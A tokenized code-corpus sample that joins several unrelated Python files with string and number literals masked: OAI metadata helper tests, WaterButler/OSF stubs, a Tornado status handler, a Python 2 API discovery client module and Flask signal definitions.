helpers . oai_process_uris ( identifiers ) <EOL> assert uri_dict == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def test_extract_uris_use_doi ( self ) : <EOL> identifiers = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> uri_dict = helpers . oai_process_uris ( identifiers , use_doi = True ) <EOL> assert uri_dict == { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def test_process_contributors ( self ) : <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> response = helpers . oai_process_contributors ( args ) <EOL> assert isinstance ( response , list ) <EOL> @ vcr . use_cassette ( '<STR_LIT>' ) <EOL> def test_oai_get_records_and_token ( self ) : <EOL> url = '<STR_LIT>' <EOL> force = False <EOL> verify = True <EOL> throttle = <NUM_LIT:0.5> <EOL> namespaces = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> records , token = helpers . oai_get_records_and_token ( url , throttle , force , namespaces , verify ) <EOL> assert records <EOL> assert token <EOL> assert len ( records ) == <NUM_LIT:50> <EOL> def test_extract_doi_from_text ( self ) : <EOL> text = [ """<STR_LIT>""" ] <EOL> extracted_doi = helpers . extract_doi_from_text ( text ) <EOL> assert extracted_doi == '<STR_LIT>' <EOL> def test_gather_identifiers ( self ) : <EOL> identifiers = [ [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> gathered = helpers . gather_identifiers ( identifiers ) <EOL> assert gathered == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def test_gather_object_uris ( self ) : <EOL> identifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> object_uris = helpers . gather_object_uris ( identifiers ) <EOL> assert object_uris == [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def test_seperate_provider_object_uris ( self ) : <EOL> identifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> provider_uris , object_uris = helpers . seperate_provider_object_uris ( identifiers ) <EOL> assert provider_uris == [ '<STR_LIT>' ] <EOL> assert object_uris == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_format_doi_as_url ( self ) : <EOL> doi1 = '<STR_LIT>' <EOL> doi2 = '<STR_LIT>' <EOL> assert helpers . format_doi_as_url ( doi1 ) == '<STR_LIT>' <EOL> assert helpers . format_doi_as_url ( doi2 ) == '<STR_LIT>' </s>
<s> from . handler import OsfAuthHandler </s>
<s> try : <EOL> from waterbutler import settings <EOL> except ImportError : <EOL> settings = { } <EOL> config = settings . get ( '<STR_LIT>' , { } ) <EOL> TEMP_URL_SECS = config . get ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> AUTH_URL = config . get ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from . provider import OSFStorageProvider <EOL> __version__ = OSFStorageProvider . __version__ </s>
<s> import tornado . web <EOL> import waterbutler <EOL> class StatusHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . write ( { <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : waterbutler . __version__ <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import copy <EOL> from email . mime . multipart import MIMEMultipart <EOL> from email . mime . nonmultipart import MIMENonMultipart <EOL> import keyword <EOL> import logging <EOL> import mimetypes <EOL> import os <EOL> import re <EOL> import urllib <EOL> import urlparse <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> import httplib2 <EOL> import mimeparse <EOL> import uritemplate <EOL> from apiclient . errors import HttpError <EOL> from apiclient . errors import InvalidJsonError <EOL> from apiclient . errors import MediaUploadSizeError <EOL> from apiclient . errors import UnacceptableMimeTypeError <EOL> from apiclient . errors import UnknownApiNameOrVersion <EOL> from apiclient . errors import UnknownFileType <EOL> from apiclient . http import HttpRequest <EOL> from apiclient . http import MediaFileUpload <EOL> from apiclient . http import MediaUpload <EOL> from apiclient . model import JsonModel <EOL> from apiclient . model import MediaModel <EOL> from apiclient . model import RawModel <EOL> from apiclient . schema import Schemas <EOL> from oauth2client . anyjson import simplejson <EOL> from oauth2client . util import _add_query_parameter <EOL> from oauth2client . util import positional <EOL> httplib2 . RETRIES = <NUM_LIT:1> <EOL> logger = logging . getLogger ( __name__ ) <EOL> URITEMPLATE = re . compile ( '<STR_LIT>' ) <EOL> VARNAME = re . compile ( '<STR_LIT>' ) <EOL> DISCOVERY_URI = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> DEFAULT_METHOD_DOC = '<STR_LIT>' <EOL> HTTP_PAYLOAD_METHODS = frozenset ( [ '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> _MEDIA_SIZE_BIT_SHIFTS = { '<STR_LIT>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT> } <EOL> BODY_PARAMETER_DEFAULT_VALUE = { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:object>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> MEDIA_BODY_PARAMETER_DEFAULT_VALUE = { <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> STACK_QUERY_PARAMETERS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:strict>' ] ) <EOL> STACK_QUERY_PARAMETER_DEFAULT_VALUE = { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT:location>' : '<STR_LIT>' } <EOL> RESERVED_WORDS = frozenset ( [ '<STR_LIT:body>' ] ) <EOL> def fix_method_name ( name ) : <EOL> """<STR_LIT>""" <EOL> if keyword . iskeyword ( name ) or name in RESERVED_WORDS : <EOL> return name + '<STR_LIT:_>' <EOL> else : <EOL> return name <EOL> def key2param ( key ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> key = list ( key ) <EOL> if not key [ <NUM_LIT:0> ] . isalpha ( ) : <EOL> result . append ( '<STR_LIT:x>' ) <EOL> for c in key : <EOL> if c . isalnum ( ) : <EOL> result . append ( c ) <EOL> else : <EOL> result . append ( '<STR_LIT:_>' ) <EOL> return '<STR_LIT>' . join ( result ) <EOL> @ positional ( <NUM_LIT:2> ) <EOL> def build ( serviceName , <EOL> version , <EOL> http = None , <EOL> discoveryServiceUrl = DISCOVERY_URI , <EOL> developerKey = None , <EOL> model = None , <EOL> requestBuilder = HttpRequest ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : serviceName , <EOL> '<STR_LIT>' : version <EOL> } <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> requested_url = uritemplate . expand ( discoveryServiceUrl , params ) <EOL> if '<STR_LIT>' in os . environ : <EOL> requested_url = _add_query_parameter ( requested_url , '<STR_LIT>' , <EOL> os . environ [ '<STR_LIT>' ] ) <EOL> logger . info ( '<STR_LIT>' % requested_url ) <EOL> resp , content = http . request ( requested_url ) <EOL> if resp . status == <NUM_LIT> : <EOL> raise UnknownApiNameOrVersion ( "<STR_LIT>" % ( serviceName , <EOL> version ) ) <EOL> if resp . status >= <NUM_LIT> : <EOL> raise HttpError ( resp , content , uri = requested_url ) <EOL> try : <EOL> service = simplejson . loads ( content ) <EOL> except ValueError , e : <EOL> logger . error ( '<STR_LIT>' + content ) <EOL> raise InvalidJsonError ( ) <EOL> return build_from_document ( content , base = discoveryServiceUrl , http = http , <EOL> developerKey = developerKey , model = model , requestBuilder = requestBuilder ) <EOL> @ positional ( <NUM_LIT:1> ) <EOL> def build_from_document ( <EOL> service , <EOL> base = None , <EOL> future = None , <EOL> http = None , <EOL> developerKey = None , <EOL> model = None , <EOL> requestBuilder = HttpRequest ) : <EOL> """<STR_LIT>""" <EOL> future = { } <EOL> if isinstance ( service , basestring ) : <EOL> service = simplejson . loads ( service ) <EOL> base = urlparse . urljoin ( service [ '<STR_LIT>' ] , service [ '<STR_LIT>' ] ) <EOL> schema = Schemas ( service ) <EOL> if model is None : <EOL> features = service . get ( '<STR_LIT>' , [ ] ) <EOL> model = JsonModel ( '<STR_LIT>' in features ) <EOL> return Resource ( http = http , baseUrl = base , model = model , <EOL> developerKey = developerKey , requestBuilder = requestBuilder , <EOL> resourceDesc = service , rootDesc = service , schema = schema ) <EOL> def _cast ( value , schema_type ) : <EOL> """<STR_LIT>""" <EOL> if schema_type == '<STR_LIT:string>' : <EOL> if type ( value ) == type ( '<STR_LIT>' ) or type ( value ) == type ( u'<STR_LIT>' ) : <EOL> return value <EOL> else : <EOL> return str ( value ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( int ( value ) ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( float ( value ) ) <EOL> elif schema_type == '<STR_LIT>' : <EOL> return str ( bool ( value ) ) . lower ( ) <EOL> else : <EOL> if type ( value ) == type ( '<STR_LIT>' ) or type ( value ) == type ( u'<STR_LIT>' ) : <EOL> return value <EOL> else : <EOL> return str ( value ) <EOL> def _media_size_to_long ( maxSize ) : <EOL> """<STR_LIT>""" <EOL> if len ( maxSize ) < <NUM_LIT:2> : <EOL> return <NUM_LIT:0> L <EOL> units = maxSize [ - <NUM_LIT:2> : ] . upper ( ) <EOL> bit_shift = _MEDIA_SIZE_BIT_SHIFTS . get ( units ) <EOL> if bit_shift is not None : <EOL> return long ( maxSize [ : - <NUM_LIT:2> ] ) << bit_shift <EOL> else : <EOL> return long ( maxSize ) <EOL> def _media_path_url_from_info ( root_desc , path_url ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT:root>' : root_desc [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : root_desc [ '<STR_LIT>' ] , <EOL> '<STR_LIT:path>' : path_url , <EOL> } <EOL> def _fix_up_parameters ( method_desc , root_desc , http_method ) : <EOL> """<STR_LIT>""" <EOL> parameters = method_desc . setdefault ( '<STR_LIT>' , { } ) <EOL> for name , description in root_desc . get ( '<STR_LIT>' , { } ) . iteritems ( ) : <EOL> parameters [ name ] = description <EOL> for name in STACK_QUERY_PARAMETERS : <EOL> parameters [ name ] = STACK_QUERY_PARAMETER_DEFAULT_VALUE . copy ( ) <EOL> if http_method in HTTP_PAYLOAD_METHODS and '<STR_LIT>' in method_desc : <EOL> body = BODY_PARAMETER_DEFAULT_VALUE . copy ( ) <EOL> body . update ( method_desc [ '<STR_LIT>' ] ) <EOL> parameters [ '<STR_LIT:body>' ] = body <EOL> return parameters <EOL> def _fix_up_media_upload ( method_desc , root_desc , path_url , parameters ) : <EOL> """<STR_LIT>""" <EOL> media_upload = method_desc . get ( '<STR_LIT>' , { } ) <EOL> accept = media_upload . get ( '<STR_LIT>' , [ ] ) <EOL> max_size = _media_size_to_long ( media_upload . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> media_path_url = None <EOL> if media_upload : <EOL> media_path_url = _media_path_url_from_info ( root_desc , path_url ) <EOL> parameters [ '<STR_LIT>' ] = MEDIA_BODY_PARAMETER_DEFAULT_VALUE . copy ( ) <EOL> if '<STR_LIT:body>' in parameters : <EOL> parameters [ '<STR_LIT:body>' ] [ '<STR_LIT>' ] = False <EOL> return accept , max_size , media_path_url <EOL> def _fix_up_method_description ( method_desc , root_desc ) : <EOL> """<STR_LIT>""" <EOL> path_url = method_desc [ '<STR_LIT:path>' ] <EOL> http_method = method_desc [ '<STR_LIT>' ] <EOL> method_id = method_desc [ '<STR_LIT:id>' ] <EOL> parameters = _fix_up_parameters ( method_desc , root_desc , http_method ) <EOL> accept , max_size , media_path_url = _fix_up_media_upload ( <EOL> method_desc , root_desc , path_url , parameters ) <EOL> return path_url , http_method , method_id , accept , max_size , media_path_url <EOL> class ResourceMethodParameters ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , method_desc ) : <EOL> """<STR_LIT>""" <EOL> self . argmap = { } <EOL> self . required_params = [ ] <EOL> self . repeated_params = [ ] <EOL> self . pattern_params = { } <EOL> self . query_params = [ ] <EOL> self . path_params = set ( ) <EOL> self . param_types = { } <EOL> self . enum_params = { } <EOL> self . set_parameters ( method_desc ) <EOL> def set_parameters ( self , method_desc ) : <EOL> """<STR_LIT>""" <EOL> for arg , desc in method_desc . get ( '<STR_LIT>' , { } ) . iteritems ( ) : <EOL> param = key2param ( arg ) <EOL> self . argmap [ param ] = arg <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . pattern_params [ param ] = desc [ '<STR_LIT>' ] <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . enum_params [ param ] = desc [ '<STR_LIT>' ] <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . required_params . append ( param ) <EOL> if desc . get ( '<STR_LIT>' ) : <EOL> self . repeated_params . append ( param ) <EOL> if desc . get ( '<STR_LIT:location>' ) == '<STR_LIT>' : <EOL> self . query_params . append ( param ) <EOL> if desc . get ( '<STR_LIT:location>' ) == '<STR_LIT:path>' : <EOL> self . path_params . add ( param ) <EOL> self . param_types [ param ] = desc . get ( '<STR_LIT:type>' , '<STR_LIT:string>' ) <EOL> for match in URITEMPLATE . finditer ( method_desc [ '<STR_LIT:path>' ] ) : <EOL> for namematch in VARNAME . finditer ( match . group ( <NUM_LIT:0> ) ) : <EOL> name = key2param ( namematch . group ( <NUM_LIT:0> ) ) <EOL> self . path_params . add ( name ) <EOL> if name in self . query_params : <EOL> self . query_params . remove ( name ) <EOL> def createMethod ( methodName , methodDesc , rootDesc , schema ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> ( pathUrl , httpMethod , methodId , accept , <EOL> maxSize , mediaPathUrl ) = _fix_up_method_description ( methodDesc , rootDesc ) <EOL> parameters = ResourceMethodParameters ( methodDesc ) <EOL> def method ( self , ** kwargs ) : <EOL> for name in kwargs . iterkeys ( ) : <EOL> if name not in parameters . argmap : <EOL> raise TypeError ( '<STR_LIT>' % name ) <EOL> keys = kwargs . keys ( ) <EOL> for name in keys : <EOL> if kwargs [ name ] is None : <EOL> del kwargs [ name ] <EOL> for name in parameters . required_params : <EOL> if name not in kwargs : <EOL> raise TypeError ( '<STR_LIT>' % name ) <EOL> for name , regex in parameters . pattern_params . iteritems ( ) : <EOL> if name in kwargs : <EOL> if isinstance ( kwargs [ name ] , basestring ) : <EOL> pvalues = [ kwargs [ name ] ] <EOL> else : <EOL> pvalues = kwargs [ name ] <EOL> for pvalue in pvalues : <EOL> if re . match ( regex , pvalue ) is None : <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( name , pvalue , regex ) ) <EOL> for name , enums in parameters . enum_params . iteritems ( ) : <EOL> if name in kwargs : <EOL> if ( name in parameters . repeated_params and <EOL> not isinstance ( kwargs [ name ] , basestring ) ) : <EOL> values = kwargs [ name ] <EOL> else : <EOL> values = [ kwargs [ name ] ] <EOL> for value in values : <EOL> if value not in enums : <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( name , value , str ( enums ) ) ) <EOL> actual_query_params = { } <EOL> actual_path_params = { } <EOL> for key , value in kwargs . iteritems ( ) : <EOL> to_type = parameters . param_types . get ( key , '<STR_LIT:string>' ) <EOL> if key in parameters . repeated_params and type ( value ) == type ( [ ] ) : <EOL> cast_value = [ _cast ( x , to_type ) for x in value ] <EOL> else : <EOL> cast_value = _cast ( value , to_type ) <EOL> if key in parameters . query_params : <EOL> actual_query_params [ parameters . argmap [ key ] ] = cast_value <EOL> if key in parameters . path_params : <EOL> actual_path_params [ parameters . argmap [ key ] ] = cast_value <EOL> body_value = kwargs . get ( '<STR_LIT:body>' , None ) <EOL> media_filename = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . _developerKey : <EOL> actual_query_params [ '<STR_LIT:key>' ] = self . _developerKey <EOL> model = self . _model <EOL> if methodName . endswith ( '<STR_LIT>' ) : <EOL> model = MediaModel ( ) <EOL> elif '<STR_LIT>' not in methodDesc : <EOL> model = RawModel ( ) <EOL> headers = { } <EOL> headers , params , query , body = model . request ( headers , <EOL> actual_path_params , actual_query_params , body_value ) <EOL> expanded_url = uritemplate . expand ( pathUrl , params ) <EOL> url = urlparse . urljoin ( self . _baseUrl , expanded_url + query ) <EOL> resumable = None <EOL> multipart_boundary = '<STR_LIT>' <EOL> if media_filename : <EOL> if isinstance ( media_filename , basestring ) : <EOL> ( media_mime_type , encoding ) = mimetypes . guess_type ( media_filename ) <EOL> if media_mime_type is None : <EOL> raise UnknownFileType ( media_filename ) <EOL> if not mimeparse . best_match ( [ media_mime_type ] , '<STR_LIT:U+002C>' . join ( accept ) ) : <EOL> raise UnacceptableMimeTypeError ( media_mime_type ) <EOL> media_upload = MediaFileUpload ( media_filename , <EOL> mimetype = media_mime_type ) <EOL> elif isinstance ( media_filename , MediaUpload ) : <EOL> media_upload = media_filename <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if maxSize > <NUM_LIT:0> and media_upload . size ( ) > maxSize : <EOL> raise MediaUploadSizeError ( "<STR_LIT>" % maxSize ) <EOL> expanded_url = uritemplate . expand ( mediaPathUrl , params ) <EOL> url = urlparse . urljoin ( self . _baseUrl , expanded_url + query ) <EOL> if media_upload . resumable ( ) : <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if media_upload . resumable ( ) : <EOL> resumable = media_upload <EOL> else : <EOL> if body is None : <EOL> headers [ '<STR_LIT>' ] = media_upload . mimetype ( ) <EOL> body = media_upload . getbytes ( <NUM_LIT:0> , media_upload . size ( ) ) <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> msgRoot = MIMEMultipart ( '<STR_LIT>' ) <EOL> setattr ( msgRoot , '<STR_LIT>' , lambda self : None ) <EOL> msg = MIMENonMultipart ( * headers [ '<STR_LIT>' ] . split ( '<STR_LIT:/>' ) ) <EOL> msg . set_payload ( body ) <EOL> msgRoot . attach ( msg ) <EOL> msg = MIMENonMultipart ( * media_upload . mimetype ( ) . split ( '<STR_LIT:/>' ) ) <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> payload = media_upload . getbytes ( <NUM_LIT:0> , media_upload . size ( ) ) <EOL> msg . set_payload ( payload ) <EOL> msgRoot . attach ( msg ) <EOL> body = msgRoot . as_string ( ) <EOL> multipart_boundary = msgRoot . get_boundary ( ) <EOL> headers [ '<STR_LIT>' ] = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % multipart_boundary <EOL> url = _add_query_parameter ( url , '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' % url ) <EOL> return self . _requestBuilder ( self . _http , <EOL> model . response , <EOL> url , <EOL> method = httpMethod , <EOL> body = body , <EOL> headers = headers , <EOL> methodId = methodId , <EOL> resumable = resumable ) <EOL> docs = [ methodDesc . get ( '<STR_LIT:description>' , DEFAULT_METHOD_DOC ) , '<STR_LIT>' ] <EOL> if len ( parameters . argmap ) > <NUM_LIT:0> : <EOL> docs . append ( '<STR_LIT>' ) <EOL> skip_parameters = rootDesc . get ( '<STR_LIT>' , { } ) . keys ( ) <EOL> skip_parameters . extend ( STACK_QUERY_PARAMETERS ) <EOL> all_args = parameters . argmap . keys ( ) <EOL> args_ordered = [ key2param ( s ) for s in methodDesc . get ( '<STR_LIT>' , [ ] ) ] <EOL> if '<STR_LIT:body>' in all_args : <EOL> args_ordered . append ( '<STR_LIT:body>' ) <EOL> for name in all_args : <EOL> if name not in args_ordered : <EOL> args_ordered . append ( name ) <EOL> for arg in args_ordered : <EOL> if arg in skip_parameters : <EOL> continue <EOL> repeated = '<STR_LIT>' <EOL> if arg in parameters . repeated_params : <EOL> repeated = '<STR_LIT>' <EOL> required = '<STR_LIT>' <EOL> if arg in parameters . required_params : <EOL> required = '<STR_LIT>' <EOL> paramdesc = methodDesc [ '<STR_LIT>' ] [ parameters . argmap [ arg ] ] <EOL> paramdoc = paramdesc . get ( '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in paramdesc : <EOL> docs . append ( <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % ( arg , paramdoc , required , repeated , <EOL> schema . prettyPrintByName ( paramdesc [ '<STR_LIT>' ] ) ) ) <EOL> else : <EOL> paramtype = paramdesc . get ( '<STR_LIT:type>' , '<STR_LIT:string>' ) <EOL> docs . append ( '<STR_LIT>' % ( arg , paramtype , paramdoc , required , <EOL> repeated ) ) <EOL> enum = paramdesc . get ( '<STR_LIT>' , [ ] ) <EOL> enumDesc = paramdesc . get ( '<STR_LIT>' , [ ] ) <EOL> if enum and enumDesc : <EOL> docs . append ( '<STR_LIT>' ) <EOL> for ( name , desc ) in zip ( enum , enumDesc ) : <EOL> docs . append ( '<STR_LIT>' % ( name , desc ) ) <EOL> if '<STR_LIT>' in methodDesc : <EOL> if methodName . endswith ( '<STR_LIT>' ) : <EOL> docs . append ( '<STR_LIT>' ) <EOL> else : <EOL> docs . append ( '<STR_LIT>' ) <EOL> docs . append ( schema . prettyPrintSchema ( methodDesc [ '<STR_LIT>' ] ) ) <EOL> setattr ( method , '<STR_LIT>' , '<STR_LIT>' . join ( docs ) ) <EOL> return ( methodName , method ) <EOL> def createNextMethod ( methodName ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> def methodNext ( self , previous_request , previous_response ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in previous_response : <EOL> return None <EOL> request = copy . copy ( previous_request ) <EOL> pageToken = previous_response [ '<STR_LIT>' ] <EOL> parsed = list ( urlparse . urlparse ( request . uri ) ) <EOL> q = parse_qsl ( parsed [ <NUM_LIT:4> ] ) <EOL> newq = [ ( key , value ) for ( key , value ) in q if key != '<STR_LIT>' ] <EOL> newq . append ( ( '<STR_LIT>' , pageToken ) ) <EOL> parsed [ <NUM_LIT:4> ] = urllib . urlencode ( newq ) <EOL> uri = urlparse . urlunparse ( parsed ) <EOL> request . uri = uri <EOL> logger . info ( '<STR_LIT>' % uri ) <EOL> return request <EOL> return ( methodName , methodNext ) <EOL> class Resource ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , http , baseUrl , model , requestBuilder , developerKey , <EOL> resourceDesc , rootDesc , schema ) : <EOL> """<STR_LIT>""" <EOL> self . _dynamic_attrs = [ ] <EOL> self . _http = http <EOL> self . _baseUrl = baseUrl <EOL> self . _model = model <EOL> self . _developerKey = developerKey <EOL> self . _requestBuilder = requestBuilder <EOL> self . _resourceDesc = resourceDesc <EOL> self . _rootDesc = rootDesc <EOL> self . _schema = schema <EOL> self . _set_service_methods ( ) <EOL> def _set_dynamic_attr ( self , attr_name , value ) : <EOL> """<STR_LIT>""" <EOL> self . _dynamic_attrs . append ( attr_name ) <EOL> self . __dict__ [ attr_name ] = value <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state_dict = copy . copy ( self . __dict__ ) <EOL> for dynamic_attr in self . _dynamic_attrs : <EOL> del state_dict [ dynamic_attr ] <EOL> del state_dict [ '<STR_LIT>' ] <EOL> return state_dict <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . _dynamic_attrs = [ ] <EOL> self . _set_service_methods ( ) <EOL> def _set_service_methods ( self ) : <EOL> self . _add_basic_methods ( self . _resourceDesc , self . _rootDesc , self . _schema ) <EOL> self . _add_nested_resources ( self . _resourceDesc , self . _rootDesc , self . _schema ) <EOL> self . _add_next_methods ( self . _resourceDesc , self . _schema ) <EOL> def _add_basic_methods ( self , resourceDesc , rootDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fixedMethodName , method = createMethod ( <EOL> methodName , methodDesc , rootDesc , schema ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) <EOL> if methodDesc . get ( '<STR_LIT>' , False ) : <EOL> fixedMethodName , method = createMethod ( <EOL> methodName + '<STR_LIT>' , methodDesc , rootDesc , schema ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) <EOL> def _add_nested_resources ( self , resourceDesc , rootDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> def createResourceMethod ( methodName , methodDesc ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> def methodResource ( self ) : <EOL> return Resource ( http = self . _http , baseUrl = self . _baseUrl , <EOL> model = self . _model , developerKey = self . _developerKey , <EOL> requestBuilder = self . _requestBuilder , <EOL> resourceDesc = methodDesc , rootDesc = rootDesc , <EOL> schema = schema ) <EOL> setattr ( methodResource , '<STR_LIT>' , '<STR_LIT>' ) <EOL> setattr ( methodResource , '<STR_LIT>' , True ) <EOL> return ( methodName , methodResource ) <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fixedMethodName , method = createResourceMethod ( methodName , methodDesc ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) <EOL> def _add_next_methods ( self , resourceDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if '<STR_LIT>' in methodDesc : <EOL> responseSchema = methodDesc [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in responseSchema : <EOL> responseSchema = schema . get ( responseSchema [ '<STR_LIT>' ] ) <EOL> hasNextPageToken = '<STR_LIT>' in responseSchema . get ( '<STR_LIT>' , <EOL> { } ) <EOL> hasPageToken = '<STR_LIT>' in methodDesc . get ( '<STR_LIT>' , { } ) <EOL> if hasNextPageToken and hasPageToken : <EOL> fixedMethodName , method = createNextMethod ( methodName + '<STR_LIT>' ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) </s>
<s> """<STR_LIT>""" <EOL> signals_available = False <EOL> try : <EOL> from blinker import Namespace <EOL> signals_available = True <EOL> except ImportError : <EOL> class Namespace ( object ) : <EOL> def signal ( self , name , doc = None ) : <EOL> return _FakeSignal ( name , doc ) <EOL> class _FakeSignal ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , doc = None ) : <EOL> self . name = name <EOL> self . __doc__ = doc <EOL> def _fail ( self , * args , ** kwargs ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> send = lambda * a , ** kw : None <EOL> connect = disconnect = has_receivers_for = receivers_for = temporarily_connected_to = connected_to = _fail <EOL> del _fail <EOL> _signals = Namespace ( ) <EOL> template_rendered = _signals . signal ( '<STR_LIT>' ) <EOL> request_started = _signals . signal ( '<STR_LIT>' ) <EOL> request_finished = _signals . signal ( '<STR_LIT>' ) <EOL> request_tearing_down = _signals . signal ( '<STR_LIT>' ) <EOL> got_request_exception = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_tearing_down = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_pushed = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_popped = _signals . signal ( '<STR_LIT>' ) <EOL> message_flashed = _signals . signal ( '<STR_LIT>' ) </s>
<s> import flask <EOL> app = flask . Flask ( __name__ ) </s>
